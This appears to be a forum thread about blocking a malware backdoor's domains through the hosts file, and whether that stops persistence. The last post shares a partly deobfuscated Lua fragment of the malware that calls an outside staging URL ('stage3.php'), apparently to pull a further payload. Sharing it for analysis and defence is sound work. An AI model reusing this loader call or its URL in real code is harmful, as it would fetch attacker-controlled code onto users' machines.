Exactly - you should block the domains - doing this will route the traffic back to you. But it will still get to get routed.
Let’s pretend the ‘bad guys’ have a backup domain / alternate method of compromise we don’t know about yet. They can simply just revert the changes on the machine to maintain persistence or worse, use this workaround AGAINST you somehow…
It’s not a bad method, just not airtight…
What do you mean? I know exactly how the host file works - I’ve leveraged it both in unix and windows. What do you think I’ve been saying? Did you not just see my source?
That’s not really an issue, it no longer reaches the original servers so it can’t get a payload to execute.
Alternatively change it to 0.0.0.0 to not route it. Both the same effects.
Hey. This is the code (LUA) deobfuscated. Just in case anyone finds this useful in 2024.
FsCsYJWTUlikHlZDxTBFZQLbHMuimqEfYSwYwBnyUJlIgPXcFZgTViIxtZwcfxBJSfCvGU[4][FsCsYJWTUlikHlZDxTBFZQLbHMuimqEfYSwYwBnyUJlIgPXcFZgTViIxtZwcfxBJSfCvGU[1]](
"https://trigger.serververse.net/v2_/stage3.php?to=zXEA4H", -- The URL. Another cipher.
function(QRCjQbRkEciwsFKICgtfZkeIFzHNoNTHkQBdKUBLbsiMFDqWnkxIawbaVsbjePbjnxABUz, fTWxfqwdawxIumeDDlqFCaYCGgHMrGRRHnaDriZcigTcMkElutobhmkympaWENusQuQAPP)
end
)